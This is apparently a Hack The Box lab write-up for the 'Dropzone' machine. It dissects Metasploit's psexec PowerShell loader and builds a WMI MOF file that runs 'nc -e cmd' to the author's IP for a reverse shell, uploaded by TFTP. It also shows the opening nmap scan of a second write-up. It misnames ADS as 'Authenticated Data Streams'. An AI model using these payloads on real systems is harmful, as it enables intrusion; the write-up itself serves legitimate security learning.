4 auxiliary/scanner/smb/psexec_loggedin_users normal No Microsoft Windows Authenticated Logged In Users Enumeration
5 encoder/x86/service manual No Register Service
6 exploit/windows/local/current_user_psexec 1999-01-01 excellent No PsExec via Current User Token
7 exploit/windows/local/wmi 1999-01-01 excellent No Windows Management Instrumentation (WMI) Remote Command Execution
8 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
9 exploit/windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution
10 exploit/windows/smb/webexec 2018-10-24 manual No WebExec Authenticated User Code Execution
Interact with a module by name or index. For example info 10, use 10 or use exploit/windows/smb/webexec
msf6 > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.18 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/smb/psexec) > irb
[*] Starting IRB shell...
[*] You are in exploit/windows/smb/psexec
So here we are in interactive ruby
msf6 exploit(windows/smb/psexec) > irb
[*] Starting IRB shell...
[*] You are in exploit/windows/smb/psexec
>>
>> cmd_psh_payload("IppsecRocks","x86")
=> "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIABRp4F8CA7VW+2vbSBD+OYH8D0sRaAWKcJNSaCBwtlO3aWPHrfK6uuLYSCN709Wuu7tKo/b6v9+sHolDnbukcMLgfczzm29GykuZWq4kWbyPY/Jja3NjyjQrCPUyNSwnIfFSNTp5H2xs4JUnpLgg+4TO+svlgSoYl8ne3rDUGqRt9tEbsH1joLgUHAwNyN/kfAEato8vryC15Afx/oreCHXJRCtWDVm6ALLdl5m7O1IpcwFF8VJwS/3Pn/1gtv08iV5/LZkw1I8rY6GIMiH8gPwMnMOTagnUH/NUK6NyG51zubsTnUrDcpigtWsYg12ozPgBZoE/DbbUktT5OAPNNfVxOdUq7WeZBmP8kMyc6VmS/EFnrd+PpbS8gOhQWtBqGYO+5imY6C2TmYCPkCeoFVvN5TwJAhS7Vl+AerIUIiRPMUMn8K1D7bFKdFUJpaZWByHWck2eY5WVAhpNf02gTf0DfG45gOD93Nrc2sw7ztjs6yplcLUxq9eA8dGpMrwW2ye9kIzRE7NKV7j1TnQJQXKLLvHmFx9Y+LD+804YRQt99QGPZmeKZwmqtCX1qnfu9GFiHkDOJRxUkhU87bhH16EMuYA6wagTm2BI1G8vIDsAAXNmHW6u2L+ovS64vdUdlFxkoPspVspgVFjE4H4wTSmofyjHUCBCzR7Z5+XIeOikW5ZXnXe3RyF/KJgxIZmW2HJpSGJgArKQ9KXh7VW/tKpe+nfhjkthecqM7cwlQYNi622opLG6TLFkmPlJvISUM+GACMlbnsGgivm88+qvhWHIhMA2QEvXWAY8cenH1hFBY4B10YMoBntYLAUUKFN3/kiwOfZ5S/aaOWwOmX8/vo7KDW8dDh0AK9FhcWOhbEjOuLY4Phymjj+/53xlcGAYQw1tEWjXGLNBZR2fPVOeOjK2kNQAaIvJj7QqBszAyxfNhKDP4ovBt3Tn7Oq0eHXFdsf7z5wj9OR9T4/+XLHxUOuPmTYLJtA29nRXypHSo7ZHp4o7DUrr+f4FtASBsxGnZ4dJXwiVuinhuhkHVDM23BQ7xeXuztpVQG4Fg7vh0R3t7X3CIBFkxCE6Ajm3i7B3s9vr4Rzo3bzoYY6Pz2uolhV1lkI3RmpcWsuithw45L3FRfH/otWWe4F/2X+gdXf2L7ePQrAXNvn+cnz/4El4Pjnzc8YtSsbIVwHNqFwLQMuMlXcJFgXrnreP+xY4Lu32BN8wW5v/APpkNmh5CAAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\""
And here we have generated our powershell payload containing the "IppsecRocks" command, for the "x86" architecture. So first of all it compresses as gzip and base64 encodes our payload :
![](prg/10/2.png)
Now we copy that base64 string and echo it out of it's base64 encryption to a file which we know is gzip:
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
→ echo 'H4sIABRp4F8CA7VW+2vbSBD+OYH8D0sRaAWKcJNSaCBwtlO3aWPHrfK6uuLYSCN709Wuu7tKo/b6v9+sHolDnbukcMLgfczzm29GykuZWq4kWbyPY/Jja3NjyjQrCPUyNSwnIfFSNTp5H2xs4JUnpLgg+4TO+svlgSoYl8ne3rDUGqRt9tEbsH1joLgUHAwNyN/kfAEato8vryC15Afx/oreCHXJRCtWDVm6ALLdl5m7O1IpcwFF8VJwS/3Pn/1gtv08iV5/LZkw1I8rY6GIMiH8gPwMnMOTagnUH/NUK6NyG51zubsTnUrDcpigtWsYg12ozPgBZoE/DbbUktT5OAPNNfVxOdUq7WeZBmP8kMyc6VmS/EFnrd+PpbS8gOhQWtBqGYO+5imY6C2TmYCPkCeoFVvN5TwJAhS7Vl+AerIUIiRPMUMn8K1D7bFKdFUJpaZWByHWck2eY5WVAhpNf02gTf0DfG45gOD93Nrc2sw7ztjs6yplcLUxq9eA8dGpMrwW2ye9kIzRE7NKV7j1TnQJQXKLLvHmFx9Y+LD+804YRQt99QGPZmeKZwmqtCX1qnfu9GFiHkDOJRxUkhU87bhH16EMuYA6wagTm2BI1G8vIDsAAXNmHW6u2L+ovS64vdUdlFxkoPspVspgVFjE4H4wTSmofyjHUCBCzR7Z5+XIeOikW5ZXnXe3RyF/KJgxIZmW2HJpSGJgArKQ9KXh7VW/tKpe+nfhjkthecqM7cwlQYNi622opLG6TLFkmPlJvISUM+GACMlbnsGgivm88+qvhWHIhMA2QEvXWAY8cenH1hFBY4B10YMoBntYLAUUKFN3/kiwOfZ5S/aaOWwOmX8/vo7KDW8dDh0AK9FhcWOhbEjOuLY4Phymjj+/53xlcGAYQw1tEWjXGLNBZR2fPVOeOjK2kNQAaIvJj7QqBszAyxfNhKDP4ovBt3Tn7Oq0eHXFdsf7z5wj9OR9T4/+XLHxUOuPmTYLJtA29nRXypHSo7ZHp4o7DUrr+f4FtASBsxGnZ4dJXwiVuinhuhkHVDM23BQ7xeXuztpVQG4Fg7vh0R3t7X3CIBFkxCE6Ajm3i7B3s9vr4Rzo3bzoYY6Pz2uolhV1lkI3RmpcWsuithw45L3FRfH/otWWe4F/2X+gdXf2L7ePQrAXNvn+cnz/4El4Pjnzc8YtSsbIVwHNqFwLQMuMlXcJFgXrnreP+xY4Lu32BN8wW5v/APpkNmh5CAAA' | base64 -d > payload.z
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
→ file payload.z
payload.z: gzip compressed data, last modified: Mon Dec 21 09:21:24 2020, max compression, from Unix, original size modulo 2^32 2169
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
→ zcat payload.z > payload.powershell
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
→ zcat payload.z
function hKSS {
Param ($doCuN, $coFTK)
$lnlX = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
return $lnlX.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($lnlX.GetMethod('GetModuleHandle')).Invoke($null, @($doCuN)))), $coFTK))
}
function tdq {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $gXQa,
[Parameter(Position = 1)] [Type] $mrjQ = [Void]
)
$yJ = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$yJ.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $gXQa).SetImplementationFlags('Runtime, Managed')
$yJ.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $mrjQ, $gXQa).SetImplementationFlags('Runtime, Managed')
return $yJ.CreateType()
}
[Byte[]]$suU = [System.Convert]::**FromBase64String("SXBwc2VjUm9ja3M=")**
$zcLY = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((hKSS kernel32.dll VirtualAlloc), (tdq @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $suU.Length,0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($suU, 0, $zcLY, $suU.length)
$hXm = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((hKSS kernel32.dll CreateThread), (tdq @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$zcLY,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((hKSS kernel32.dll WaitForSingleObject), (tdq @([IntPtr], [Int32]))).Invoke($hXm,0xffffffff) | Out-Null
So here we know what's the powershell payload metasploit uses and in this there's yet another base64 which is the command we wanted to execute:
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
→ echo "SXBwc2VjUm9ja3M=" | base64 -d
IppsecRocks
So here we see everything metasploit does just to get that powershell command in. But again, this is a x86 windows machine, we don't have powershell to work with. The next option psexec would try is the SMB file upload which does not help us either because from our previous enumeration, the smb ports are not opened. What was required to do in this box, was to check each option psexec.rb does one by one until you stumble on the correct one, which was the MOF one defined as the mof_upload function:
def mof_upload(smb_share)
share = "\\\\#{datastore['RHOST']}\\ADMIN$"
filename = "#{Rex::Text.rand_text_alpha(8)}.exe"
# payload as exe
print_status("Trying wbemexec...")
print_status("Uploading Payload...")
if smb_share != 'ADMIN$'
print_error('Wbem will only work with ADMIN$ share')
return
end
simple.connect(share)
exe = generate_payload_exe
fd = smb_open("\\system32\\#{filename}", 'rwct', write: true)
fd << exe
fd.close
print_status("Created %SystemRoot%\\system32\\#{filename}")
# mof to cause execution of above
mofname = Rex::Text.rand_text_alphanumeric(14) + ".MOF"
mof = generate_mof(mofname, filename)
print_status("Uploading MOF...")
fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct', write: true)
fd << mof
fd.close
print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
# Disconnect from the ADMIN$
simple.disconnect(share)
end
Here the smbfunction will try wbemexec , but it will work only if the smb share is ADMIN$ otherwise wbem wouldn't work. Then it connects, generates an exe payload, only to drop that meterpreter file into system32. Then lastly it uses the generate_mof() function and then uploads the generated payload into \\system32\\wbem\\mof\\ and then it just disconnects. Which means, that you get remote code execution just by dropping a file into that folder. now let's check generate_mof() from interactive ruby mode:
msf6 exploit(windows/smb/psexec) > irb
[*] Starting IRB shell...
[*] You are in exploit/windows/smb/psexec
>> generate_mof("IppsecRocks","AndIsCool")
=> "#pragma namespace(\"\\\\\\\\.\\\\root\\\\cimv2\")\nclass MyClass773\n{\n \t[key] string Name;\n};\nclass ActiveScriptEventConsumer : __EventConsumer\n{\n \t[key] string Name;\n \t[not_null] string ScriptingEngine;\n \tstring ScriptFileName;\n \t[template] string ScriptText;\n uint32 KillTimeout;\n};\ninstance of __Win32Provider as $P\n{\n Name = \"ActiveScriptEventConsumer\";\n CLSID = \"{266c72e7-62e8-11d1-ad89-00c04fd8fdff}\";\n PerUserInitialization = TRUE;\n};\ninstance of __EventConsumerProviderRegistration\n{\n Provider = $P;\n ConsumerClassNames = {\"ActiveScriptEventConsumer\"};\n};\nInstance of ActiveScriptEventConsumer as $cons\n{\n Name = \"ASEC\";\n ScriptingEngine = \"JScript\";\n ScriptText = \"\\ntry {var s = new ActiveXObject(\\\"Wscript.Shell\\\");\\ns.Run(\\\"AndIsCool\\\");} catch (err) {};\\nsv = GetObject(\\\"winmgmts:root\\\\\\\\cimv2\\\");try {sv.Delete(\\\"MyClass773\\\");} catch (err) {};try {sv.Delete(\\\"__EventFilter.Name='instfilt'\\\");} catch (err) {};try {sv.Delete(\\\"ActiveScriptEventConsumer.Name='ASEC'\\\");} catch(err) {};\";\n\n};\nInstance of ActiveScriptEventConsumer as $cons2\n{\n Name = \"qndASEC\";\n ScriptingEngine = \"JScript\";\n ScriptText = \"\\nvar objfs = new ActiveXObject(\\\"Scripting.FileSystemObject\\\");\\ntry {var f1 = objfs.GetFile(\\\"wbem\\\\\\\\mof\\\\\\\\good\\\\\\\\IppsecRocks\\\");\\nf1.Delete(true);} catch(err) {};\\ntry {\\nvar f2 = objfs.GetFile(\\\"AndIsCool\\\");\\nf2.Delete(true);\\nvar s = GetObject(\\\"winmgmts:root\\\\\\\\cimv2\\\");s.Delete(\\\"__EventFilter.Name='qndfilt'\\\");s.Delete(\\\"ActiveScriptEventConsumer.Name='qndASEC'\\\");\\n} catch(err) {};\";\n};\ninstance of __EventFilter as $Filt\n{\n Name = \"instfilt\";\n Query = \"SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \\\"MyClass773\\\"\";\n QueryLanguage = \"WQL\";\n};\ninstance of __EventFilter as $Filt2\n{\n Name = \"qndfilt\";\n Query = \"SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \\\"Win32_Process\\\" AND TargetInstance.Name = \\\"AndIsCool\\\"\";\n QueryLanguage = \"WQL\";\n\n};\ninstance of __FilterToConsumerBinding as $bind\n{\n Consumer = $cons;\n Filter = $Filt;\n};\ninstance of __FilterToConsumerBinding as $bind2\n{\n Consumer = $cons2;\n Filter = $Filt2;\n};\ninstance of MyClass773 as $MyClass\n{\n Name = \"ClassConsumer\";\n};\n"
Now from here we're going to print out the generate_mof() function by using ruby's puts (print) function:
>> puts generate_mof("IppsecRocks","AndIsCool")
#pragma namespace("\\\\.\\root\\cimv2")
class MyClass40351
{
[key] string Name;
};
class ActiveScriptEventConsumer : __EventConsumer
{
[key] string Name;
[not_null] string ScriptingEngine;
string ScriptFileName;
[template] string ScriptText;
uint32 KillTimeout;
};
instance of __Win32Provider as $P
{
Name = "ActiveScriptEventConsumer";
CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
PerUserInitialization = TRUE;
};
instance of __EventConsumerProviderRegistration
{
Provider = $P;
ConsumerClassNames = {"ActiveScriptEventConsumer"};
};
Instance of ActiveScriptEventConsumer as $cons
{
Name = "ASEC";
ScriptingEngine = "JScript";
ScriptText = "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"AndIsCool\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass40351\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";
};
Instance of ActiveScriptEventConsumer as $cons2
{
Name = "qndASEC";
ScriptingEngine = "JScript";
ScriptText = "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\IppsecRocks\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"AndIsCool\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
};
instance of __EventFilter as $Filt
{
Name = "instfilt";
Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass40351\"";
QueryLanguage = "WQL";
};
instance of __EventFilter as $Filt2
{
Name = "qndfilt";
Query = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"AndIsCool\"";
QueryLanguage = "WQL";
};
instance of __FilterToConsumerBinding as $bind
{
Consumer = $cons;
Filter = $Filt;
};
instance of __FilterToConsumerBinding as $bind2
{
Consumer = $cons2;
Filter = $Filt2;
};
instance of MyClass40351 as $MyClass
{
Name = "ClassConsumer";
};
=> nil
>>
Now i'll copy this entire output into a file to edit:
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
→ mkdir psexec
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
→ cd psexec
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ vim generated_mof
Now from here, we see that our file will be located in \\\\\"wbem\\\\\\\\\\\\\\\mof\\\\\\\\\\\\\\\good\\\\\\\\\\\\\\\IppsecRocks\\\\\ and the command we're running is ns.Run(\"AndIsCool\") which is a javascript command. Essentially MOF works by compiling syntax like this into the wbem database to execute said code. The idea here is to create a "FilterToConsumerBinding" to tie together a "EventFilter" and a "ActiveScriptEventConsumer" so that the FilterToConsumerBinding detects the Filtered Event (which could simply be something like watch when this file appears in the wbem database), it will launch the Script
(for more information about MOF check out these links: [pop pop ret mof](https://poppopret.blogspot.com/2011/09/playing-with-mof-files-on-windows-for.html) and [BlackHat WMI talk from 2015 by Matt Graeber](https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf))
Now let's trim the useless parts out of our generated mof file:
#pragma namespace("\\\\.\\root\\cimv2")
class MyClass40351
{
[key] string Name;
};
class ActiveScriptEventConsumer : __EventConsumer
{
[key] string Name;
[not_null] string ScriptingEngine;
string ScriptFileName;
[template] string ScriptText;
uint32 KillTimeout;
};
instance of __Win32Provider as $P
{
Name = "ActiveScriptEventConsumer";
CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
PerUserInitialization = TRUE;
};
instance of __EventConsumerProviderRegistration
{
Provider = $P;
ConsumerClassNames = {"ActiveScriptEventConsumer"};
};
Instance of ActiveScriptEventConsumer as $cons
{
Name = "ASEC";
ScriptingEngine = "JScript";
ScriptText = "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"AndIsCool\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass40351\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";
};
instance of __EventFilter as $Filt
{
Name = "instfilt";
Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass40351\"";
QueryLanguage = "WQL";
};
instance of __FilterToConsumerBinding as $bind
{
Consumer = $cons;
Filter = $Filt;
};
instance of MyClass40351 as $MyClass
{
Name = "ClassConsumer";
};
and from here, we don't want to run the command "AndIsCool" but we want the command "nc -e cmd 10.10.14.6 9002" so from inside vim you can run the following : **:%s/AndIsCool/nc -e cmd 10.10.14.6 9002/gi** in order to replace the AndIsCool pattern matched by regex to whatever other string we want.
![](prg/10/3.png)
Now basically what this does is that our EventFilter will detect the creation of Class 27736, and when it gets created, it will launch the code we want (the netcat command)
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ ls -l
total 4
-rw-r--r-- 1 nothing nothing 1415 Dec 21 11:10 generated_mof
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ locate nc.exe
/usr/lib/mono/4.5/cert-sync.exe
/usr/share/windows-resources/binaries/nc.exe
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ cp /usr/share/windows-resources/binaries/nc.exe .
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ ls -l
total 64
-rw-r--r-- 1 nothing nothing 1415 Dec 21 11:10 generated_mof
-rwxr-xr-x 1 nothing nothing 59392 Dec 21 11:10 nc.exe
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ file nc.exe
nc.exe: PE32 executable (console) Intel 80386, for MS Windows
So now we have the correct 32bit nc.exe file we want, now let's upload it via tftp:
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ tftp 10.10.10.90
tftp> mode binary
tftp> put nc.exe /windows/system32/nc.exe
Sent 59392 bytes in 4.3 seconds
tftp> quit
We switched from ascii to binary mode to upload our nc file properly:
[ 10.10.14.6/23 ] [ /dev/pts/16 ] [_HTB/Dropzone/psexec]
→ l
total 72K
drwxr-xr-x 2 nothing nothing 4.0K Dec 21 11:10 .
drwxr-xr-x 3 nothing nothing 4.0K Dec 21 10:48 ..
-rw-r--r-- 1 nothing nothing 1.4K Dec 21 11:10 generated_mof
-rwxr-xr-x 1 nothing nothing 58K Dec 21 11:10 nc.exe
[ 10.10.14.6/23 ] [ /dev/pts/16 ] [_HTB/Dropzone/psexec]
→ tftp 10.10.10.90
tftp> put generated_mof /windows/system32/wbem/mof/ippsecrocks.mof
Here basically we want to put our mof file into the /windows/system32/wbem/mof/ directory where it will be executed automatically
![](prg/10/4.png)
And we get a connection! now let's try to print the root flag:
## **Part 3 : Getting Root Access**
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ nc -lvnp 9002
listening on [any] 9002 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.90] 1051
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>type C:\Docume~1\Admini~1\Desktop\root.txt
type C:\Docume~1\Admini~1\Desktop\root.txt
It's easy, but not THAT easy...
C:\WINDOWS\system32>type "C:\Docume~1\Admini~1\Desktop\flags\2 for the price of 1!.txt"
type "C:\Docume~1\Admini~1\Desktop\flags\2 for the price of 1!.txt"
For limited time only!
Keep an eye on our **ADS** for new offers & discounts!
And from here we see that root.txt isn't there, but in the flags directory we are hinted at ADS which stands for Authenticated Data Streams, however Windows XP does not have a method to view ADS natively, so that means we're going to download the required binary [here](https://docs.microsoft.com/en-us/sysinternals/downloads/streams):
![](prg/10/5.png)
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ wget https://download.sysinternals.com/files/Streams.zip
--2020-12-21 11:22:51-- https://download.sysinternals.com/files/Streams.zip
Resolving download.sysinternals.com (download.sysinternals.com)... 152.199.19.160
Connecting to download.sysinternals.com (download.sysinternals.com)|152.199.19.160|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 511505 (500K) [application/octet-stream]
Saving to: Streams.zip
Streams.zip 100%[===========================================================>] 499.52K --.-KB/s in 0.09s
2020-12-21 11:22:52 (5.67 MB/s) - Streams.zip saved [511505/511505]
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ unzip Streams.zip
Archive: Streams.zip
inflating: streams.exe
inflating: streams64.exe
inflating: streams64a.exe
inflating: Eula.txt
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ file streams.exe
streams.exe: PE32 executable (console) Intel 80386, for MS Windows
So here we're going to send the 32 bit executable obviously, and we're putting it in /windows/system32/ to avoid the need to type the absolute path everytime:
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ file streams.exe
streams.exe: PE32 executable (console) Intel 80386, for MS Windows
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
→ tftp 10.10.10.90
tftp> mode binary
tftp> put streams.exe /windows/system32/streams.exe
Sent 342392 bytes in 30.2 seconds
cd C:\docume~1\administrator\desktop\flags\
streams -accepteula
streams 2*
And there we have it!
![](prg/10/6.png)
And that's it ! we have been able to get both flags for this box.
## **Conclusion**
Here we can see the progress graph :
![](img/10_graph.png)

868
Hard/11.md Normal file
View file

@ -0,0 +1,868 @@
# Reel Writeup
![](img/11.png)
## Introduction :
Reel is a hard windows box released back in June 2018.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.77 --max-retries 0 -Pn --min-rate=500 | grep Discovered
[sudo] password for nothing:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Discovered open port 135/tcp on 10.10.10.77
Discovered open port 21/tcp on 10.10.10.77
Discovered open port 22/tcp on 10.10.10.77
Discovered open port 139/tcp on 10.10.10.77
Discovered open port 25/tcp on 10.10.10.77
Discovered open port 445/tcp on 10.10.10.77
Discovered open port 49159/tcp on 10.10.10.77
Discovered open port 593/tcp on 10.10.10.77
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ sudo nmap -sCV -p21,22,139,25,445,593,49159 10.10.10.77
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-12 17:16 CET
Nmap scan report for 10.10.10.77
Host is up (0.035s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18 11:19PM <****DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| TerminalServerCookie:
| 220 Mail Service ready
|_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49159/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.91%I=7%D=1/12%Time=5FFDCB73%P=x86_64-pc-linux-gnu%r(NULL
SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\x20S
SF:ervice\x20ready\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\r\n")%
SF:r(Help,54,"220\x20Mail\x20Service\x20ready\r\n211\x20DATA\x20HELO\x20EH
SF:LO\x20MAIL\x20NOOP\x20QUIT\x20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n"
SF:)%r(GenericLines,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20s
SF:equence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r
SF:\n")%r(GetRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20
SF:sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\
SF:r\n")%r(HTTPOptions,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x
